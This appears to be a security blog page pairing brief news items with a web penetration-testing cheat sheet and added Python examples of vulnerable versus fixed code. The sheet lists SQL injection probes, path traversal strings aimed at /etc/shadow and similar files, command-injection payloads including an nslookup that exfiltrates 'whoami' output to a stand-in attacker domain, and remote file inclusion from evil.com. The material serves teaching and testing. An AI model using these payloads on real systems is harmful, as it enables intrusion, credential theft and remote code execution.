Details of 10.6 million MGM hotel guests posted on a hacking forum
Source: https://www.zdnet.com/article/exclusive-details-of-10-6-million-of-mgm-hotel-guests-posted-on-a-hacking-forum/
@yevhsec
It seems to me that some organizations are mistaken in stating that they have a full SDLC only when they are running a static analysis using something like Coverity.
Sometimes sqlmap shows that one of the parameters is vulnerable, but then you notice that you need to play with different tamper values to break through some kind of firewall, and of course this is not always successful.
What do you think about the “12 word phrase” as a secure flow for password restoring? This third-party library is used by companies like blockchain.com, nash.io, and others. But what if I say that all validation occurs on the client side, with informative errors for T and F statements, and all possible phrases are stored in the JS file? My ticket on HackerOne was declined, apparently it is an absolutely secure flow for password restoring ;)
Sudo CVE-2019-18634 flaw allows Non-Privileged Linux and macOS Users run commands as Root
http://i.securitythinkingcap.com/RPK4pJ

Why do people deploy applications with dev mode turned on in a production release?
Penetration Testing Django and Rails
Here are the slides for the talk I gave last night at OWASP NY/NJ.
Slides: Pentesting Django and Rails, by levigross.
I reported this vulnerability almost half a year ago, but it has not been fixed yet.
Cross Site Scripting
Types of XSS injections:
1) Stored - possible when a website or web application stores user input and later serves it to other users. An application is vulnerable if it does not validate user input before storing the content and embedding it into HTML response pages.
2) Reflected - the attacker’s payload has to be part of the request that is sent to the web server. It is then reflected back in such a way that the HTTP response includes the payload from the HTTP request. Attackers use malicious links, phishing emails, and other social engineering techniques to lure the victim into making a request to the server.
3) DOM based - possible if the web application’s client-side scripts write data provided by the user to the Document Object Model (DOM). The data is subsequently read from the DOM by the web application and output to the browser. If the data is incorrectly handled, an attacker can inject a payload, which will be stored as part of the DOM and executed when the data is read back from the DOM.
4) Universal Cross-site Scripting - unlike common XSS attacks, UXSS exploits client-side vulnerabilities in the browser or browser extensions in order to generate an XSS condition and execute malicious code. When such vulnerabilities are found and exploited, the behavior of the browser is affected and its security features may be bypassed or disabled.
Available for manipulation:
Cookie
DOM
Connectivity
Async JS requests
Toolset: Acunetix, w3af, BeEF
Basic payload:
Image payload:
HTML5 payload:

SQL injection
SQL injection is one of the most common code injection techniques, aimed at gaining access to the database. It is made possible by improper handling of user input by the application.
Related to:
Language: SQL
Platform: Any (requires interaction with a SQL database)
Types of SQL injection:
Error based
Boolean based blind
Time based blind
Toolset: sqlmap
Detection
Detection of Error based SQL injection:
'
"
#
;
)
Encoding:
%27
%22
%23
%3B
Multiple encoding:
%%2727
%%2222
%%2323
%%3B3B
Detection of Boolean based blind SQL injection:
TRUE statements:
aNd 1=1
aNd 21=21
anD 1=1;//
orDeR bY 1
FALSE statements:
aNd 0=1
anD 9=2
anD 57=276;//
ordEr bY 1000000000000
Characters to use instead of spaces:
+
/**/
%20
Comments to end the queries:
/*
//
#
%23
--
Detection of Time based blind:
aNd sleep
SLEEP(15)
BENCHMARK(100000000, rand())
WAITFOR DELAY '00:00:15'
WAITFOR TIME '00:00:15'
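The error-based and boolean-based probes listed above only work because the input is spliced into the SQL text. The following is an added example, not part of the original sheet: it runs a TRUE/FALSE probe pair and a lone-quote probe against a constructed SQLite table through a concatenated query and through a parameterized one, so the difference a tester (or a defender verifying a fix) looks for is visible side by side.

```python
import sqlite3

def make_db():
    """Constructed sample table (not from the cheat sheet) to run the probes against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn

def lookup_vulnerable(conn, name):
    """Builds the SQL text by concatenation: the input becomes part of the query."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, name):
    """Parameterized query: the driver sends the value separately from the SQL text."""
    rows = conn.execute("SELECT id FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]

# Probes from the sheet: a TRUE/FALSE pair, each terminated with a '--' comment.
TRUE_PROBE = "alice' aNd 1=1--"
FALSE_PROBE = "alice' aNd 0=1--"

def boolean_probe(lookup, conn):
    """(rows for TRUE probe, rows for FALSE probe); a difference means the input reaches SQL."""
    return lookup(conn, TRUE_PROBE), lookup(conn, FALSE_PROBE)

def quote_breaks_query(lookup, conn):
    """Error-based probe: does a lone quote make the database raise a syntax error?"""
    try:
        lookup(conn, "alice'")
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", boolean_probe(lookup_vulnerable, db), quote_breaks_query(lookup_vulnerable, db))
    print("parameterized:", boolean_probe(lookup_safe, db), quote_breaks_query(lookup_safe, db))
```

On the concatenated query the TRUE probe returns alice's row while the FALSE probe returns nothing, and the lone quote raises an error; on the parameterized query both probes return nothing and no error occurs, which is the behaviour a fixed endpoint should show.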
Exploitation
General select syntax:
Notes:
When executing queries you need to consider encodings.
Example of encoding query to utf8:
UniOn select table_name COLLATE utf8_general_ci,table_schema COLLATE utf8_general_ci,'1' from information_schema.tables
sqlmap
Path traversal
A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, such that characters representing "traverse to parent directory" are passed through to the file APIs.
Where to detect?
Check dynamic URL:
https://yevh.ye/img/loadImage?filename=ye.jpj
Check page elements:
<img src="/loadImage?filename=ye.jpj">
Basic checks:
..
../
..\
..../
....\/
....//
....\\
Encoding:
..%c0%af
..%252f
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
Expected base folder:
/var/www/images/../../../etc/passwd
Expected file extension:
/var/www/images/../../../etc/passwd%00.jpj
Popular server paths:
/var/www/ - Apache
/etc/nginx/ - NGINX
Linux interesting files:
/etc/passwd
/etc/shadow
/proc/self/environ
/etc/mysql/my.cnf
/proc/net/route
Windows interesting files:
\windows\win.ini
\inetpub\logs\logfiles
\Users\Administrator\NTUser.dat
\Administrator\NTUser.dat
\apache\logs\access.log
\apache\logs\error.log
\apache\php\php.ini
References
OWASP
Command Injection
OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.
Useful commands:
Linux:
whoami --- Name of current user.
uname -a --- Operating system.
ifconfig --- Network configuration.
netstat -an --- Network connections.
ps -ef --- Running processes.
Windows:
whoami --- Name of current user.
ver --- Operating system.
ipconfig /all --- Network configuration.
netstat -an --- Network connections.
tasklist --- Running processes.
Basic payloads:
Note: VC = valid_command
VC ;ls --- Execute ls after VC
VC | ls --- Sends the output of VC as input to ls
VC || ls --- Executes ls only if VC returns a nonzero exit status (error)
VC $(ls) --- Sends the output of ls as arguments to VC
VC `ls` --- Sends the output of ls as arguments to VC
VC && ls --- Executes ls after VC, only if VC returns 0
Bypass Blacklisted words:
w'h'o'am'i
w"h"o"am"i
w\ho\am\i
/\b\i\n/////s\h
Blind command injection payloads:
& ping -c 10 127.0.0.1 &
& whoami > /var/www/static/whoami.txt &
& nslookup kgji2ohoyw.web-attacker.com &
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
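Every payload above relies on the application handing user input to a shell, where `;`, `|`, `&&`, `$( )` and backticks are interpreted, and the quoting tricks in the blacklist-bypass list show why filtering known words does not help. The following is an added example, not code from the original sheet: a "ping" wrapper built as a shell string beside one that validates the target against an allow-list and passes it as a single argv element. `echo` is used as a harmless stand-in for `ping` and the regex is an assumed hostname allow-list.

```python
import re
import subprocess

# Assumed allow-list: hostnames and IPv4 literals only; quotes and shell metacharacters never match.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

def run_vulnerable(target):
    """Command string built from user input and run by /bin/sh: metacharacters are interpreted."""
    proc = subprocess.run("echo pinging " + target, shell=True, capture_output=True, text=True)
    return proc.stdout

def run_safe(target):
    """Allow-list check, then argv list without a shell: the target is one literal argument."""
    if not HOST_RE.fullmatch(target):
        raise ValueError("rejected target: " + repr(target))
    proc = subprocess.run(["echo", "pinging", target], capture_output=True, text=True)
    return proc.stdout

def rejected(target):
    """True if run_safe refuses the target (used to exercise the allow-list)."""
    try:
        run_safe(target)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(run_vulnerable("127.0.0.1; echo INJECTED"))   # second command runs
    print(run_safe("127.0.0.1"))                         # only the intended command runs
    print(rejected("w'h'o'am'i"), rejected("127.0.0.1; echo INJECTED"))
```

Even without the allow-list, the argv form would pass the whole string `127.0.0.1; echo INJECTED` to `echo` as one argument; the allow-list additionally rejects it up front so the oddity is logged rather than silently echoed.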
References:
OWASP
File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
Can lead to:
Code execution on the web server.
Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting.
Denial of Service (DoS).
Sensitive Information Disclosure.
Types:
Local File Inclusion (LFI) - the process of including files that are already present locally on the server, by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives as input the path to the file that has to be included, and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.
Remote File Inclusion (RFI) - occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI supplied as a user-controlled parameter to the web application.
Basic payloads LFI:
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
Basic payloads RFI:
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
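The path traversal checks earlier on this page and the LFI/RFI payloads just above all target the same mistake: a user-supplied name is joined to a base directory (or fetched as a URI) without being confined. The following is an added example, not code from the original sheet, of a resolver that handles the listed tricks: single and double URL encoding (`%2e`, `%252e`), the `%00` extension cut-off, backslash separators, remote URIs, and `..` escaping the base folder. The base directory and the `.jpg`/`.png` allow-list are assumed values.

```python
import os
from urllib.parse import unquote

ALLOWED_EXT = {".jpg", ".png"}   # assumed allow-list for an image-loading handler

def decode_once(raw):
    """Decode one layer of %xx; reject double encoding (%252e) and embedded NUL (%00)."""
    once = unquote(raw)
    if unquote(once) != once:      # a second decode still changes it: %25-style double encoding
        return None
    if "\x00" in once:             # %00 is used to cut off an appended extension check
        return None
    return once

def resolve_under(base_dir, raw_filename):
    """Real path of raw_filename if it stays under base_dir with an allowed extension, else None."""
    name = decode_once(raw_filename)
    if name is None or "\\" in name or "://" in name:   # Windows separators, remote URIs (RFI)
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))  # collapses ../ and follows symlinks
    if os.path.commonpath([base, target]) != base:       # escaped the base folder
        return None
    if os.path.splitext(target)[1].lower() not in ALLOWED_EXT:
        return None
    return target

if __name__ == "__main__":
    for probe in ["ye.jpg", "../../../etc/passwd", "%252e%252e%252fetc%252fpasswd",
                  "../../../etc/passwd%00.jpg", "http://evil.com/shell.txt"]:
        print(repr(probe), "->", resolve_under("/var/www/images", probe))
```

A rejected name should be logged with the raw value, since the encoded forms are a strong signal of probing.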
References
OWASP
Cryptographic recommendations
This sheet presents cryptographic recommendations and libraries to use.
Recommendations:
Key exchange: Diffie–Hellman key exchange with minimum 2048 bits
Message Integrity: HMAC-SHA2
Message Hash: SHA2 256 bits
Asymmetric encryption: RSA 2048 bits
Symmetric-key algorithm: AES 128 bits
Password Hashing: Argon2, PBKDF2, Scrypt, Bcrypt
Recommended libraries:
Python: MbedTLS, Libsodium, PyNaCl, Libnacl.
Ruby: Nacl, djb's.
JS: Crypto-js.
Go: Crypto.
Java: Java.security, Javax.crypto.
PHP: Hash, OpenSSL.
C/C++: OpenSSL.
Do not use:
C: random(), rand() ----> getrandom(2)
Java: java.util.Random() ----> java.security.SecureRandom
PHP: rand() or mt_rand() ----> random_int() or random_bytes()
References:
OWASP Guide to Cryptography
Mozilla TLS wiki
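Two of the recommendations above, PBKDF2 for password hashing and HMAC-SHA2 for message integrity, can be met with the Python standard library alone. The following is an added example, not from the original sheet: salted PBKDF2-HMAC-SHA256 with the parameters stored next to the hash, constant-time verification, and an HMAC-SHA256 tag. The iteration count and the storage format are assumed choices; the salt comes from `secrets`, the CSPRNG counterpart of the `rand()`-style calls the sheet says not to use.

```python
import base64
import hashlib
import hmac
import secrets

ITERATIONS = 600_000   # assumed work factor; tune so one derivation costs ~100 ms on your hardware

def hash_password(password, iterations=ITERATIONS, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt; returns algo$iterations$salt$digest."""
    salt = salt if salt is not None else secrets.token_bytes(16)   # CSPRNG, never random.random()
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)
    return "pbkdf2-sha256${}${}${}".format(
        iterations, base64.b64encode(salt).decode(), base64.b64encode(digest).decode())

def verify_password(password, stored):
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_b64, digest_b64 = stored.split("$")
    if algo != "pbkdf2-sha256":
        return False
    salt, expected = base64.b64decode(salt_b64), base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations), dklen=32)
    return hmac.compare_digest(actual, expected)   # no early exit on the first differing byte

def tag_message(key, message):
    """HMAC-SHA256 integrity tag (hex) over message with a shared secret key."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()

def verify_message(key, message, tag):
    """Recompute the tag and compare in constant time."""
    return hmac.compare_digest(tag_message(key, message), tag)

if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record), verify_password("guess", record))
    key = secrets.token_bytes(32)
    tag = tag_message(key, b"transfer 10")
    print(verify_message(key, b"transfer 10", tag), verify_message(key, b"transfer 100", tag))
```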
